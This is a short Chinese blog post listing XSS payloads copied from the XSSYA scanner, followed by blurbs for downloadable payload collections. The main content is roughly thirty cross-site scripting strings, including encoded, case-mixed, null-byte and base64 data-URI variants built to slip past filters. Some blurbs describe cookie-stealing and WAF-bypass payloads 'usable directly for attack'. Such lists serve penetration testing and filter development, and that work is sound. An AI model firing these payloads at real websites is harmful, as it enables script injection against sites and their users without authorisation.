`

xss payload

    博客分类:
  • web
 
阅读更多
1. 代码来自xssya.py
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip

"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
              "1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
                "<script>alert('xssya')</script>",
                "'';!--\"<XSS>=&{()}",
                "%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
                "<scr<script>ipt>alert(1)</scr<script>ipt>",
                "%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
                "%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
                "%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
                "%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
                "<iframesrc=\"javascript:alert(2)\">",
                "<iframe/src=\"data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
                "<form action=\"Javascript:alert(1)\"><input type=submit>",
                "<isindex action=data:text/html, type=image>",
                "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
                "<svg/onload=prompt(1);>",
                "<marquee/onstart=confirm(2)>/",
                "<body onload=prompt(1);>",
                "<q/oncut=open()>",
                "<a onmouseover=location=’javascript:alert(1)>click",
                "<svg><script>alert&#40/1/&#41</script>",
                "&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;",
                "<scri%00pt>alert(1);</scri%00pt>",
                "<scri%00pt>confirm(0);</scri%00pt>",
                "5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
                "<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>",
                "<marquee/onstart=confirm(2)>",
                "<A HREF=\"http://www.google.com./\">XSS</A>",
                "<svg/onload=prompt(1);>"
分享到:
评论

相关推荐

    xss payload下载

    多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在

    XSS payload大全

    总结的XSS的payload,可以直接使用,直接进行攻击,各种payload

    xss常见payload脚本

    xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...

    2020年仍然有效的一些XSS Payload

    2020年仍然有效的一些XSS Payload

    渗透测试 漏洞xss payload大全

    8k加语句,一次插个爽

    XSS测试payload

    XSS测试payload,收集了简单的XSS测试用例,较具有实用性。

    Tiny-XSS-Payloads:一组微小的XSS Payload,可以在不同的上下文中使用。 https:tinyxss.terjanq.me

    Tiny-XSS-有效载荷短XSS有效负载的集合,可以在不同的上下文中使用。 此处提供了演示: : 当前有效负载&lt;!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM --&...

    xss的各种payload脚本

    xss 各种绕waf脚本语句

    Web应用安全:XSS盗取cookiepayload.pptx

    XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的...

    1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md

    一些关于xss的payload

    xsspayload大全.txt

    各类xss漏洞payload,包含:没有事件处理程序、没有空间、无斜杠(/)、没有等号(=)、不带尖括号(&gt;)、无提示,确认,提示、类payload

    xss-payload-list::bullseye:跨站点脚本(XSS)漏洞有效负载列表

    :rocket: 跨站点脚本(XSS)漏洞有效负载列表 :rocket: 概述 : 跨站点脚本(XSS)攻击是一种注入,其中恶意脚本被注入到原本良性和可信任的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)...

    XSS漏洞 DOM型测试 payload代码

    XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。

    xsserme.zip

    XSS Platform集成了一些常见的XSS Payload,可以很方便的利用漏洞对网站进行渗透。网上有一些现成的xss平台,不过由于担心自己的食物被别人窃取等等的原因,很多人选择自己搭建一个平台,这样既方便又实用。那么如何...

    Web应用安全:XSS盗取cookiepayload(实验习题).docx

    Web应用安全:XSS盗取cookiepayload(实验习题).docx

    XSS_Cheat_Sheet_2020_Edition:xss裂缝模糊测试payload的最佳集合2020版

    共计100+条xss突破测试小技巧本版本翻译自国外的XSS_Cheat_Sheet_2020_Edition.pdf副本,源文件可在本项目内直接下载整理完毕的测试payload清单文件为: xss_payload_list.txt整理不易,少侠,留个小星星再走吧(ฅ&gt;...

    xss-receiver:简单易用的 xss 接收平台 + payload 管理平台

    XSS Receiver基于 Flask 的 xss 接收 + payload 管理平台,主要功能:在特定路由上保存访问历史以及携带数据命中特定路由时发送邮件动态切换路由及其对应的 payload 文件管理、编辑 payloadDocker 快速部署安装clone...

    XSS_Bypass_Cookbook_ver_3.0.pdf

    5 构造无需交互的payload&绕过事件过滤 5.1 onerror/onload 事件 5.2 onfocus与autofocus 5.3 onblur与autofocus 5.4 标签的ontoggle事件 5.5 flash-xss的自动触发 5.6 任意标签的自动触发 6 CSP Bypass 7 XSS ...

    XSS-Payload

    :rocket: (XSS)有效负载列表 :rocket: 概述 已编译供公众使用的XSS列表。 您可以将其用作扫描仪的有效载荷 让我们连接: :

    frame2canvas

    frame2canvas 当某些资源被做了referer限制时,无法直接请求得到正确返回内容。...插入xss payload,用iframe包含同源页面,读取iframe的document.body,使用html2canvas截图并以post传输到攻击者服务端。

Global site tag (gtag.js) - Google Analytics